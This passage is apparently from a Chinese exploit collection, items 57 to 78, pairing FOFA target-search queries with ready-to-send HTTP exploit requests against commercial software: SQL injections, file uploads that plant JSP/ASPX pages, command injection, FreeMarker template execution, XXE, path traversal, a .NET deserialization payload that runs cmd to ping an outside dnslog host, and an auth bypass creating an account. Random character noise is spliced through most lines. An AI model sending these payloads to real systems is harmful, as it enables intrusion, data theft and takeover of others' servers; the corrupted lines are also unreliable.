Host: x.x.x.x$ Y1 S# F1 T" c$ V) p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.364 D+ l; U# h- f u. e
Content-Type: application/json
/ N7 J+ J6 |& E# g _$ k6 \: {( I
" L2 e3 V2 O( o. m; L{& b- Z. y# _, D1 L8 D
"storeID":{
, j0 q `& _: Z) d2 G! h' g. V "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
; Z9 V" C" N" C% k! F7 I. B! c "MethodName":"Start",
% ~' v0 `6 m4 j3 X* k- l "ObjectInstance":{
2 s/ y" N, l7 B" O0 c7 Y "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",& p6 W( w( O! g3 |- B
"StartInfo": {
, ~- ?" g; s4 R5 r% \( a; @" T "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
' e1 [% _9 [; J. } "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"/ ^: ]! Q6 a$ J$ v& K6 D0 S
}' f" T: B2 h9 c& y
}
`, S3 u' s! u) ?& | }
! \1 T$ L# X. X( b5 J}
4 m! _3 a! K% m6 B" }3 T
* p$ k4 S! H* A! s9 r) s m8 [" @4 }0 J# ^* C6 ?5 G
57. 畅捷通T+ keyEdit.aspx SQL注入 l I# T, \7 ^' _, X& d
FOFA:app="畅捷通-TPlus"
5 `8 H1 V9 T. _- [; m( Z* w: O0 k+ _GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1. E# M/ D+ N! m( g. |3 }
Host: host7 b% w( a0 m# P
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
2 V" r3 ? T- w$ M. s B) x4 R1 LAccept-Charset: utf-8
) k5 ]" c& H# @+ oAccept-Encoding: gzip, deflate
6 f+ y# X1 ?8 ~Connection: close0 e; n* y4 a ]/ H( x* o
5 e* F/ ~$ D+ ~
9 c, |1 b( x- i: M- O2 T58. 畅捷通T+ KeyInfoList.aspx sql注入
. u4 u! u( e( n" M- HFOFA:app="畅捷通-TPlus"
) A! Y1 O) d) N9 L# E: g/ {GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
7 v. a5 L: D, O1 M6 x0 e2 d( ]Host: your-ip
" V5 j+ @3 o2 _! b* }, H+ WUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
8 q$ g" C$ @5 z( PAccept-Charset: utf-89 Q* X9 G, C, D2 J
Accept-Encoding: gzip, deflate8 w! t0 s, y0 G+ D
Connection: close8 y. V# r2 ^+ }0 j
8 X s0 k+ }; Q! c/ L
6 L5 \* f. a7 B2 x7 E' z6 H59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
& x0 I" r E6 a9 v5 f6 tFOFA: title="@XETUX" && title="XPOS" && body="BackEnd". ~4 _ s# t7 B( q; k
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
( Y6 @& @8 f) O% P! _ z5 eHost: 192.168.86.128:9090
7 `4 v# |( R# k7 {9 j' jUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
- n% l; z' X+ y9 S, I; ]* x8 RConnection: close% i' K& L2 T( ]. z4 [' Y
Content-Length: 1669
% j0 Z$ ~7 Y" c# r# O2 [Accept: */*
1 r6 n! J! d; {- Z3 U0 ~' B9 ~7 wAccept-Language: en4 G- m5 ~6 T: O
Content-Type: application/x-www-form-urlencoded1 c1 j1 \- P3 O2 E: X
Accept-Encoding: gzip3 `4 t2 p, `( r% z# U
7 U; x+ W$ n+ @5 ?
PAYLOAD
/ W& q% ^$ X5 {) J
! m z, X" f9 Z* x9 r2 Z! n& a: v8 b4 K& n& X3 w3 X5 Z
60. 百卓Smart管理平台 importexport.php SQL注入
6 N% V0 ^$ [2 ~% t6 z5 I! SFOFA:title="Smart管理平台"( K- ]3 C! }+ l2 d* M
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1: e' x% N. ^4 s2 l7 z6 w
Host:1 E. M$ u+ e! B5 X& k b2 A% C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36* T1 A8 q% |% Z, \6 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 x2 T T& X$ c3 ~, R: j6 C# [
Accept-Encoding: gzip, deflate: J9 e( A! w4 x# E6 r8 F
Accept-Language: zh-CN,zh;q=0.97 j$ E& [9 a! o( g; k* n, F" I
Connection: close
( [7 w G% } O8 |& ^1 G+ j3 N
# o4 Y, u2 v7 \5 F" s$ ]6 a: x2 Y* \" H+ L
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传/ a. ]7 ?4 n& W. v( U; n& k
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
0 I7 C# ^; m( O# G, w IPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.11 H4 W6 E9 b! b
Host: x.x.x.x
" G1 [4 F5 x; R7 W0 i$ yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: _( u* p! _/ `* s/ \Connection: close
( v# K; b! T* B" J5 HContent-Length: 27
g* @" w1 f* y# V) g# j* s6 f! VAccept: */*
; f. v: X! H7 R* HAccept-Encoding: gzip, deflate d7 E# v8 r6 m% D) ^& ^4 p
Accept-Language: en @. ^+ F4 a2 g1 B: |4 \2 H
Content-Type: application/x-www-form-urlencoded& `) P3 |: T0 w/ D- A9 Z: j$ ~
+ l" D. U8 _8 A' j* G# q8uxssX66eqrqtKObcVa0kid98xa
9 X9 z) w* F, S
) U( S6 m5 f$ O+ E& E
1 c- a, ]$ e. a( j+ g" c# n0 b62. IP-guard WebServer 远程命令执行3 _7 s5 G$ U7 c- ~
FOFA:"IP-guard" && icon_hash="2030860561"& s, ?- l- F9 ]: H1 K
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.18 o* t* G4 Q0 j' ~
Host: x.x.x.x% P; n2 K, M# a7 V" U% @
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36/ ? y5 P# e; a4 p1 W4 y. |& v
Connection: close6 R, ~* h2 ~4 C* D
Accept: */*
% R. [5 u" b3 N: K' K( V6 ?Accept-Language: en3 [) h3 B- |3 Q7 t8 }/ f- X" y. U
Accept-Encoding: gzip3 m! [* [3 M2 A5 I! t
' k+ G# S5 ]* k5 T
% ~/ @5 Q/ Z4 _' ~. f/ i
访问6 w3 v2 T$ h) w( f; a
w7 b& M1 c) OGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
: M" Y( s2 a, ~8 BHost: x.x.x.x
8 W" L9 h U4 q" N8 H) L" c: Z
! D/ m a, |) L! q9 T) A) F$ |# Z+ m' b+ q. \0 D7 D4 Z
63. IP-guard WebServer任意文件读取' K2 q' E2 t& I; R5 ~( E' A
IP-guard < 4.82.0609.0
2 ]6 E. c8 X0 M6 v; SFOFA:icon_hash="2030860561") \: T9 g! H0 k1 a% D3 W
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1- C' E+ U2 l7 T/ x& c5 V& W( Y
Host: your-ip
& j& z, m# C$ b- D( |: N# A. x5 A, vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
" m1 h3 x2 F6 w0 M# dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. i+ K) D8 U; ~# c& q: H
Accept-Encoding: gzip, deflate5 h ^9 I4 d0 o) e) ?! R) q
Accept-Language: zh-CN,zh;q=0.9! S, z8 Z# Q7 W$ s
Connection: close
3 k# E# o) r2 d; H l4 ]Content-Type: application/x-www-form-urlencoded1 v/ ~ Q+ K+ r. H) J- D
+ k/ t% s$ {, Jpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
" t6 r$ z3 [# m B9 i J
7 ]% X5 O( G. w z" _64. 捷诚管理信息系统CWSFinanceCommon SQL注入+ I: z, p) t0 N9 x" L; p$ ?3 i; |- I
FOFA:body="/Scripts/EnjoyMsg.js"
' `) l8 L- e, W G. @% T$ }POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1! `8 H% @; b6 c3 s( S# ?' D
Host: 192.168.86.128:90019 M0 T( t' K& r9 C5 O' b1 I5 c" L
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36, V% p& b5 v$ ^0 `9 c
Connection: close
" y0 w4 j3 Q% ~0 c7 pContent-Length: 369! x- D* P: [. D
Accept: */*
Y4 Q; W& q7 M' ~" w1 sAccept-Language: en$ t4 c1 Y9 Y) ^- a: a# Q
Content-Type: text/xml; charset=utf-8
4 c* s. |2 B- v# Z l' T* HAccept-Encoding: gzip
$ u) B/ P9 V9 b. T6 { j: n& G% y o/ g b. L2 _3 y
<?xml version="1.0" encoding="utf-8"?>
! v4 \+ C: q+ Q& `# O- u<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
% w' n. W- y/ `( ]) e<soap:Body>
5 @6 f; a9 g! d. f- y <GetOSpById xmlns="http://tempuri.org/">' ?: u7 R; P6 p9 |7 {
<sId>1';waitfor delay '0:0:5'--+</sId>) _9 m, t3 Q& y) F
</GetOSpById>8 T4 T9 @: f$ n' B4 j
</soap:Body>* c. v; s$ \3 U) x( t
</soap:Envelope>' M" C& T H, B' `' Z
4 m6 Y$ K- I' J7 r; {3 T
- q/ Z5 `, e7 ^$ {/ u65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
1 n/ z: Z2 m: ?1 U6 {FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"/ U3 n6 g9 h2 H) |) L
响应200即成功创建账号test123456/123456
) G5 C& g3 h0 _POST /SystemMng.ashx HTTP/1.11 V' G) ^ k8 m% A N8 W& D
Host:* m' T7 m$ \- w5 {
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1), s, f1 b% Q6 N' ~& Q! I1 K, u
Accept-Encoding: gzip, deflate! A- I5 R, N- ?2 i }# f9 K
Accept: */*
# O i3 g( p1 @1 O0 K8 ], r3 ?Connection: close
# [% E8 B$ r. t: m! aAccept-Language: en8 D0 B9 [2 n. {% g& F
Content-Length: 174! V; ?; \5 c4 J) V: ^
; Q& H3 J2 B- ^$ n2 n+ q! ooperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators( a y* m+ Z5 g0 W7 O& ?! L% @" y9 j
0 O" K! V! s$ b- Q
3 H6 p( p3 p8 z4 Y. V- E
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
1 \! R8 f, ], s7 E- z* |' YFOFA:app="万户ezOFFICE协同管理平台"8 m8 Y+ c# V7 V# c
6 ~" N) c5 R7 ]! b' [GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1' R$ V! [" V4 C' ]
Host: x.x.x.x2 H/ y! q! z5 ~5 g8 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
7 J" J0 q' T# ?Connection: close
$ g" P2 Z/ G# T vAccept: */*, t+ ^1 W# k6 N# a$ E# ]
Accept-Language: en
/ W4 H+ d* i/ _" x# CAccept-Encoding: gzip2 R: H" v6 }3 h( h1 x! X
' q( h/ E9 k# ?
# ]; j! {' M( B3 b4 Y3 `第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在, i% B$ i# ?2 g( y; n
# g- V- h3 g7 A4 [) M# A( t
67. 万户ezOFFICE wpsservlet任意文件上传5 `9 E) l# i4 g9 P( x4 Z- ~2 f4 X+ |
FOFA:app="万户网络-ezOFFICE"
0 `( A% {1 X; N* e5 d# `, p+ hnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
" n4 J0 S4 x, c- gPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1! G5 S& N: Q. ^8 O9 a; T3 y+ Z
Host: x.x.x.x
1 S& T# ?; X1 ]. NUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
" Z: m, O/ J, eContent-Length: 1733 B, r* ~' M h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8+ u) H8 R; g/ V4 `5 U4 |) M
Accept-Encoding: gzip, deflate e- r1 y& P- G7 v, \3 N
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3( n4 D% z8 y0 J, K" J; r
Connection: close& `) C2 X7 J0 d$ g
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
9 i% u5 {1 n( j( ~5 gDNT: 1" ?) a" g# N, L5 l1 Q/ k1 J
Upgrade-Insecure-Requests: 1
/ L8 S$ b0 T- P8 g% h$ H
7 `9 s# c' `( J5 K3 R--ufuadpxathqvxfqnuyuqaozvseiueerp ^1 ~! n+ a9 k+ l0 T8 ~/ \
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"2 h/ E% ]# t9 ~" o& I
3 @ V0 B+ V" q: U; K8 H<% out.print("sasdfghjkj");%>
% |. V8 p( ^) x4 S--ufuadpxathqvxfqnuyuqaozvseiueerp--- H5 ]* B h1 M
4 E: B. N4 ?, {* I0 W) Z' [1 W
& X( E- g, e/ @! e文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp1 X) \ O+ \) ]3 h% v; d1 M
1 w2 {# z4 j0 [) C3 R' w" A+ ^68. 万户ezOFFICE wf_printnum.jsp SQL注入
; J% b: P5 Q' PFOFA:app="万户ezOFFICE协同管理平台"5 Q$ M# Q C, o4 j
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1+ ~: O( I3 q+ @
Host: {{host}}
' L! e, ? H2 M" p/ g( h( nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36/ ~, w# o4 c3 G B0 u! A( f( U* |
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8/ M* N- ~/ H: ]
Accept-Encoding: gzip, deflate/ y9 C' P) P' H: @
Accept-Language: zh-CN,zh;q=0.9
& X% b, W7 z) T8 YConnection: close
% u+ w* n& g/ Q' G. I3 C5 X0 N% K% a: `2 m6 R
6 ^; x* k& g, B9 }- N: s: S0 q
69. 万户 ezOFFICE contract_gd.jsp SQL注入
4 k: h) y2 j* A1 [# Q1 x1 S U9 rFOFA:app="万户ezOFFICE协同管理平台", P2 x; e1 g2 P% a' A9 @/ W C1 Q
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1. |1 @5 N. y3 @8 K7 f
Host: your-ip# c6 H$ Y) c' d t
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! g2 ^+ G8 l* [
Accept-Encoding: gzip, deflate! g" c: X0 i, P8 k
Accept: */*% s- A" k; c* i) t- W/ e
Connection: keep-alive
* {5 \2 _8 O3 e) z3 X$ d/ `( ]4 I* p2 l
3 e+ n U8 @, `# x; u/ j4 W70. 万户ezEIP success 命令执行
0 t$ I) L( U) R( b) ?/ cFOFA:app="万户网络-ezEIP"7 b$ N! T# I/ O# b% g
POST /member/success.aspx HTTP/1.1- T- Q, @! ?7 N' |! Y' [
Host: {{Hostname}}) I2 L7 h; W3 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
8 K) x- n1 [7 T. u3 I0 u# cSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
, ?% x/ p6 ~9 P% _: }* sContent-Type: application/x-www-form-urlencoded/ ]$ ] n* M( A# m# L u9 n+ t1 l
TYPE: C/ ], ~3 ^0 \' C! ^) c6 H6 ]
Content-Length: 16702
8 U/ C C- }+ |" q2 d! X
% ]* ~) H+ C4 c) |__VIEWSTATE=PAYLOAD
3 ~) l5 ?- ]( w: u! d9 l [( E) s. v5 r' F' J# _5 M& o1 V
* H1 q: Y) c! m# n71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入8 h H! \# \/ O% j
FOFA:body="PM2项目管理系统BS版增强工具.zip"
4 e6 Q4 q( B* M+ [; Y! q8 d- k& TGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
6 I W8 z b) m. C, f( l! GHost: x.x.x.xx.x.x.x! p# ? ?& Q3 j: C3 E8 j' k
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
8 S1 x! {; G# J7 z& |Connection: close
1 @" R1 c3 l' V. o# xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% p) a2 {! B9 E' [5 a
Accept-Encoding: gzip, deflate
* C4 E" g4 A0 [' ^( W8 w' t0 ]& Q* dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: d: `( d- T1 x: V1 z2 J( K/ l) j
Upgrade-Insecure-Requests: 1
: |% @# x: g/ U) f/ J
2 T$ y2 s: R1 _- ?. b( a6 ^- g
0 H9 h3 F5 K; M6 {9 f5 B* [72. 致远OA getAjaxDataServlet XXE# v1 M4 ], E8 t+ C; q9 N/ i" c4 ?+ ?
FOFA:app="致远互联-OA"& b7 M& _1 Q! {0 ~( t, }1 H/ s6 B
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1/ P/ A0 b: q- N5 r: q! \
Host: 192.168.40.131:8099
+ P* g" |! L- u) e- z2 S* QUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36. V" }" X! L0 l0 T# E
Connection: close: i" W4 e+ a: K% q* A
Content-Length: 5830 I# B$ P0 e5 P! w+ _5 l }9 [( a
Content-Type: application/x-www-form-urlencoded
" m8 y; q% Y; v) s* y7 jAccept-Encoding: gzip
5 E' Q/ |5 W, ~( L* {" y1 d3 A+ w
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
$ _# Y' d& j% T5 X& A3 p1 z1 u2 I' k O# f
; d. {( }( ~+ w8 w& W+ T73. GeoServer wms远程代码执行3 R2 H& e& b D# `% A' n; V2 v
FOFA:icon_hash=”97540678”
! M' a' Z/ g9 m: H8 r% E# Q( Z) S( H1 \POST /geoserver/wms HTTP/1.1- P- @3 r4 [; y: w. W; s5 k
Host:
( g' ~5 e5 u7 }, a1 v' PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36! Z' d' m0 x* u) i
Content-Length: 1981+ u6 z. i* j0 x* ]6 |
Accept-Encoding: gzip, deflate( S' V+ N7 ^* S+ I: j6 _: h( [
Connection: close% [, n, ]( Z c; I" i, I* n+ f4 t
Content-Type: application/xml% T" v* ]9 @+ N: ^' ^6 k
SL-CE-SUID: 3
! R9 I0 U" O. S( h3 a. h: |4 b+ W3 _ S( A3 X6 @/ ]9 W
PAYLOAD
7 I- n A! i. ^9 ~6 U. l: _/ X( }
% i1 u' B& Y% ^+ ?
74. 致远M3-server 6_1sp1 反序列化RCE
$ O! ~6 @8 b5 C% bFOFA:title="M3-Server"
/ I! Z: _- o! I" I hPAYLOAD3 ]! P! H# V# _
5 Z' B& y7 {8 |- x- U1 y
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
; y2 j* d; x7 h: o! ]FOFA:app="TELESQUARE-TLR-2005KSH"+ S0 |8 t4 i+ P9 C N/ X& y
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1/ ~) B, f( g7 ?
Host: x.x.x.x* U! G* ]8 E# [9 N& M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 J+ n# f3 ]* Y' A& m& n* o. X% _Connection: close2 n0 X; G8 x) Q( V
Accept: */*7 @4 {3 I, d; Y9 B- j
Accept-Language: en
' c# s0 z# L+ a1 ^: i. I. y IAccept-Encoding: gzip
# A1 q& v: ~& \1 Q- n+ D% p. H' ]/ X( P
$ D2 r0 S P$ B5 |6 q4 G
GET /cgi-bin/test28256.txt HTTP/1.1! T0 E9 m) f# A# ]
Host: x.x.x.x
) J7 N- h! b4 W5 Z5 m% p5 @4 B- W6 X( h' R, M: `
! ~9 a3 g$ }4 R1 Z76. 新开普掌上校园服务管理平台service.action远程命令执行* x6 I5 n- S1 |1 T* ]0 x
FOFA:title="掌上校园服务管理平台"
# [0 @0 S- {( u9 c, `- j- XPOST /service_transport/service.action HTTP/1.1
9 I! F# A) B! O; F' j) u |& mHost: x.x.x.x7 M8 q5 O5 N8 M4 ?/ {7 H/ j0 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0: i; }3 B0 h" _3 W+ _
Connection: close
, t3 h8 W1 }1 F: @Content-Length: 211
3 d' o( F3 W2 B. G; ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* D4 h5 H) b& U5 i: XAccept-Encoding: gzip, deflate# \" G2 }7 Q2 Z! W6 G, e, B! I1 Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
^) L8 U8 v J& h2 k# tCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4; O x4 ~* M7 N4 H3 U3 m9 T
Upgrade-Insecure-Requests: 1
4 t; e$ N O( K( A4 ]
! s- s3 n6 U9 g+ H{! l+ l5 \0 q- z3 N: @
"command": "GetFZinfo",9 N6 B. M, W) f# y$ \: Y* Q3 q1 t
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"+ e W; E4 [3 z$ K) Q
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"2 a) C0 I# l$ [
}5 `+ W9 H3 Y* X$ v# L! e# g }
- X* F3 J, f$ U+ N1 E4 C- Z8 i. B7 u3 D4 ]; T
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1) \0 K4 {( t3 C( F/ ]
Host: x.x.x.x& J+ s' N, U9 k, p8 o$ k
! u& g% ]2 A- f4 [9 ?. ]( f- T5 \2 x k! G/ K! }# J
* z0 p! V5 X9 V8 {6 ~3 b77. F22服装管理软件系统UploadHandler.ashx任意文件上传; f. i$ i j! a- {: v
FOFA:body="F22WEB登陆"# v; v7 X N3 C3 D* J! O
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
+ ^2 |8 E- h& y# L% v; I* l PHost: x.x.x.x5 B+ k, l' j) @( F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 ~3 S! @" Z4 ?# S0 pConnection: close: K# U, x. D) A$ C" }; [
Content-Length: 433' S# U3 R" @0 [" \) S U7 u
Accept: */*
: w+ K5 }4 l3 o! Y) R6 P& b; t: ^Accept-Encoding: gzip, deflate, b& ]2 ]' F. g' S: c
Accept-Language: zh-CN,zh;q=0.9, y% G: `3 \# o E
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix$ Q* E7 ], s1 Q2 G" K6 J8 v
4 e' B$ X; y/ Q j% D7 f
------------398jnjVTTlDVXHlE7yYnfwBoix" Z$ `; v# l3 j7 c3 A
Content-Disposition: form-data; name="folder"* i+ Z1 ^' g( A
u, h, X9 i+ U9 x
/upload/udplog
- U7 V. C3 l! K; ?. {% J( x( i------------398jnjVTTlDVXHlE7yYnfwBoix
0 T7 I" ^3 E5 X8 Y' W, kContent-Disposition: form-data; name="Filedata"; filename="1.aspx"# _7 U4 F4 v2 H8 r& A5 k) Y4 @
Content-Type: application/octet-stream
; m, x M3 a% M H, e' i* z
$ b5 X. ^, s$ J Rhello1234567
, m& t& l* C$ g7 N, a/ W------------398jnjVTTlDVXHlE7yYnfwBoix
1 _! p% `! w7 Q7 |5 gContent-Disposition: form-data; name="Upload"
; [! |' w% [, p7 Q- {5 L+ I: P! d B5 B
Submit Query
- y2 i" D& }( r1 z; a------------398jnjVTTlDVXHlE7yYnfwBoix--9 u' B! ^, ]% R# Q/ z+ v
. @' o1 W! o/ A1 c* A) e7 A6 t+ E
3 P/ D$ b8 C# U$ F4 Q$ V
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
# ] d$ ]2 G& ]2 ?# t9 iFOFA:icon_hash="2001627082"* y) M1 u- j* V" U
POST /Platform/System/FileUpload.ashx HTTP/1.1
5 A' ~" F, z" q( H9 Z0 [Host: x.x.x.x6 L1 i% C% N! j7 W H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* `4 |' d- Z; c& e$ X1 l2 v" @
Connection: close
7 M D% k4 c* H, B# h* |& iContent-Length: 3368 v) F: _8 k1 t5 w& I$ X: B
Accept-Encoding: gzip
' r \2 i3 i0 Y6 O. ^ Q" ~Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l3 q! w. l* {% X+ f* ^$ v3 V
) s+ s6 u x) u6 f2 l# [8 a+ s
------YsOxWxSvj1KyZow1PTsh98fdu6l
: x, c ]' @, b: HContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt": i$ a( {2 q* G
Content-Type: image/png4 e0 s% j# c7 k4 G
, i' G- n# ^1 L0 ~
YsOxWxSvj1KyZow1PTsh98fdu6l2 M- v6 K% z3 G/ H8 g+ g
------YsOxWxSvj1KyZow1PTsh98fdu6l- H; Z& E, P8 z
Content-Disposition: form-data; name="target"
0 c1 f7 I" P N* e' \+ }
% N& d& y( t+ z, w2 [8 h/Applications/SkillDevelopAndEHS/8 u3 T) I5 _' N! p2 s5 U
